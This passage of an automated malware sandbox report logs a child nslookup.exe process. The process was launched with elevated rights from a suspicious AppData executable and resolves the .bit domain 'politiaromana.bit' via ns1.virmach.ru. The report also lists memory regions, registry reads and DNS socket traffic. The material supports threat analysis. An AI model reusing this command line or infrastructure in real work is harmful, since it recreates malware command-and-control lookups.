| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
|
For performance reasons, the remaining 2222 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process #22: nslookup.exe
8
19
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\nslookup.exe |
| Command Line | nslookup politiaromana.bit ns1.virmach.ru |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:05, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:18 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd48 |
| Parent PID | 0xcf0 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A10
0x
D34
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| nslookup.exe | 0x00070000 | 0x00086fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x0408ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x04091fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x04093fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x040dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040e0000 | 0x040e0000 | 0x0411ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004120000 | 0x04120000 | 0x04121fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x04130000 | 0x041edfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000041f0000 | 0x041f0000 | 0x041f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004200000 | 0x04200000 | 0x043fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004400000 | 0x04400000 | 0x0443ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0447ffff | Private Memory | Readable, Writable |
|
|
|
- |
| imm32.dll | 0x04480000 | 0x044a9fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000004480000 | 0x04480000 | 0x04480fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004490000 | 0x04490000 | 0x04490fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x0454ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004600000 | 0x04600000 | 0x046fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004860000 | 0x04860000 | 0x0486ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004870000 | 0x04870000 | 0x049f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000004a00000 | 0x04a00000 | 0x04b80fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000004b90000 | 0x04b90000 | 0x05f8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000005f90000 | 0x05f90000 | 0x0638afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x06390000 | 0x066c6fff | Memory Mapped File | Readable |
|
|
|
- |
| wow64win.dll | 0x542b0000 | 0x54329fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x54330000 | 0x5437ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x54380000 | 0x54387fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x6f440000 | 0x6f44afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x6f450000 | 0x6f463fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x6f470000 | 0x6f485fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x6f490000 | 0x6f4a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x71540000 | 0x71586fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x71590000 | 0x71597fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x715a0000 | 0x715cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x715d0000 | 0x71653fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x71660000 | 0x716aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x73860000 | 0x7387afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x73bb0000 | 0x73bb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x73bc0000 | 0x73bddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x73be0000 | 0x73be6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x740c0000 | 0x7411efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74120000 | 0x741fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x74300000 | 0x743bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x74530000 | 0x7455afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74610000 | 0x746bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74fd0000 | 0x75027fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x75090000 | 0x750d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x764e0000 | 0x7662efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766c0000 | 0x7683dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76840000 | 0x76986fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76e90000 | 0x7700afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f8c0000 | 0x7f8c0000 | 0x7f9bffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007f9c0000 | 0x7f9c0000 | 0x7f9e2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df9abbfffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x00007df9abc00000 | 0x7df9abc00000 | 0x7ff9abbfffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff9abc00000 | 0x7ff9abdc0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff9abdc1000 | 0x7ff9abdc1000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0xa10
8
19
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x70000 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList |
|
1 | |
| DNS | Get Hostname | name_out = x2vS1cum |
|
1 | |
| DNS | Resolve Name | host = ns1.virmach.ru, address_out = 109.234.35.56 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 44, size_out = 44 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 44 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 51 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 107 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 |
